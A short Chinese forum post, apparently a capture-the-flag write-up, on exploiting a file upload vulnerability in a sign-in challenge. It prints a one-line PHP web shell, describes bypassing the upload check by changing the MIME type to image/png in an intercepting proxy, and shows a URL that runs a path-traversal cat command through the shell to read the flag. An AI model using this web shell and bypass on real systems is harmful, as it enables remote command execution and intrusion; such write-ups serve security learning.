首页
社区
课程
招聘
[分享]签到题 逐光启航 文件上传漏洞
发表于: 2024-8-15 13:57 160

[分享]签到题 逐光启航 文件上传漏洞

2024-8-15 13:57
160

0x00 队友根据注释的base64 解码得到上传文件的php

0x01 编写一句话木马 yuzhou.php

1
<?php system($_GET['cmd']); ?>

0x02 上传的时候Charles抓捕拦截修改文件类型为:image/png 成功上传

0x03 队友通过上传的木马脚本遍历flag文件

···
http://871dc9a5-32d7-4cac-9d01-6f2abaa08845.node.pediy.com:81/upload/yuzhou.php?cmd=cat../../../../flag
···

0x04 最终找到flag


[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//